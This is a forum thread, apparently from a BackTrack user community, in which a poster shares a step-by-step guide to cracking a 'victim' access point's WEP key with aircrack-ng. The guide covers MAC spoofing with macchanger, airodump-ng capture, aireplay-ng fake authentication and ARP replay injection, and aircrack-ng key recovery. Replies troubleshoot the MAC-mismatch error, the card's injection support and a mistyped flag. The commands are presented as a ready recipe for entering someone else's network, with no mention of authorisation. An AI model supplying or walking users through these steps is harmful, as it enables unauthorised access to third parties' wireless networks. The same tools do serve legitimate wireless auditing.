Thread: Packet injection, Mac Adresses... HELP

Just burned his ISO

Exclamation Packet injection, Mac Adresses... HELP

My spec:
    • Toshiba M30X laptop,
    • Backtrack 3
    • Centrino ipw200 driver
    • Im using eth1

hi, ive downloaded bt3 iso and boted up live cd and everything ok, i have been following these instructions:

====================
    Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Duble click the home icon, rigt click the blank white area and select create new Txt File name it (exidous) or what ever you want! click ok, now close the window.

*open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing were going to do is stop the device aka ethernet card
    airmon-ng stop ath0

* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
    ifconfig (device) down

* Ok now just to make things simpler, so we don't have to hunt down what our Mac address is
    macchanger --mac 00:11:22:33:44:55 (device)

* Now were going to start the wireless card *make it listen for AP's
    airmon-ng start (device)

* Lets start seeing what AP's are there
    airodump-ng (device)

* After you see all the AP's execute the following command to stop it and copy the bssid
    CTRL+C Copy bssid of victom

* Now on to the victim's AP (were listening in for authentication packets
    airodump-ng -c 6 -w Exidous --bssid (Bssid) (device)

* Lets get on with making more Data, and start the injection process
    aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now were going to inject the router ***this sometimes takes a while to actually inject!
    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV's for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV's for 128 bit encryption
    aircrack-ng -n 64 --bssid (bssid) exidous-01.cap
    ===================

ok, now on the parts i have higlighted red, it says the error
    "The interface Mac doesn't match the specified MAC (-h)
    ifconfig eth1 hw ether"
    yes i have looked on websites how to change mac address of wireless cards, downloaded 2 programmes, i kept changing my MAC to 00:11:22:33:44:55 but wen i boot into backtrack it just says the same error has anyone else had this problem??

Also, im using ipw2200 driver, i have heard that this is compatible, but it wont let me packet inject i know you have to patch/tweak something but i cannot find a simple guide on how-to.. If anyone can get me a pretty easy/simple guide on packet-injecting with ipw2200 then THANK YOU!

Any help is appreciated, thanks

Quote Originally Posted by Wilson08 View Post
    My spec:
    Also, im using ipw2200 driver, i have heard that this is compatible, but it wont let me packet inject i know you have to patch/tweak something but i cannot find a simple guide on how-to.. If anyone can get me a pretty easy/simple guide on packet-injecting with ipw2200 then THANK YOU!

Any help is appreciated, thanks
    I don't know if ipw2200 is capable of packet injection or not, although if you search these forums, there are tons of threads about which cards/drivers can packet inject or not. However, if you want to test for packet injection, just run aireplay-ng in test mode:

aireplay-ng -9 <your wireless interface>

The test should tell you if the card can packet inject or not.

Just burned his ISO

ok, ill test my card later, but does anyone know about the mac address problem?

Just burned his ISO

Try this(that¨s what I do just to be apsolutly shure what is my mac ads):
    Write:
    macchanger --mac 1122334455 wlan0 (<---yes, the BT# will say that that is NOT the correct format and he will display current mac adress) If not same than the one you enter for home line (after -h) just change it. The device marking too if not ssme as the one I wrote. Some cards don¨t allow changing mac. Everyone say they should but they don¨t.

Just burned his ISO

ok, now on the parts i have higlighted red, it says the error
    "The interface Mac doesn't match the specified MAC (-h)
    ifconfig eth1 hw ether" yes i have looked on websites how to change mac address of wireless cards, downloaded 2 programmes, i kept changing my MAC to 00:11:22:33:44:55 but wen i boot into backtrack it just says the same error has anyone else had this problem??
    If you are "changing" your MAC address ( not quite sure how) and then booting to the BT live CD then your NIC will always revert to the MAC thats hardwired into it at manufacture.

To change your MAC try the following
    Code:
    airmon-ng stop  <your NIC>
    ifconfig <your NIC> down
    macchanger --mac 00:11:22:33:44:55 <your NIC>
    airmon-ng start <your NIC>

Just burned his ISO

Could it be that when you are connecting you use the aireplay-ng -l 0 -a command when it should be the aireplay-ng -1 0 -a command - 1 instead of l?

Very good friend of the forum killadaninja's Avatar

1. If you are booting from a live distrubution your mac we be reset at reboot.
    2. macchanger (dev) --mac=(new mac) thats how I change my mac.
    3. aireplay-ng --test (dev) this will test injection
    4. I hope I win the lottery soon
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.